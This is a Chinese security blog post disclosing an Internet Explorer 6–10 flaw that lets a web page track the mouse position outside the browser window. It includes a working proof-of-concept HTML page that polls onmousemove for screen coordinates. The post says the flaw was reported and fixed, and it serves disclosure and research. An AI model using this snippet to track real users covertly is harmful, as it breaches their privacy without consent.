IE浏览器鼠标坐标跟踪安全风险,通杀全版本

2012-12-14 145176人围观 ,发现 7 个不明物体 漏洞

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。

影响版本:IE6-10


Code:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>
发表评论

已有 7 条评论

取消
Loading...
G.r0b1n

一个普通的安全攻城狮,Web安全、渗透测试、IoT & so on

26 文章数 107 评论数

特别推荐

推荐关注

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php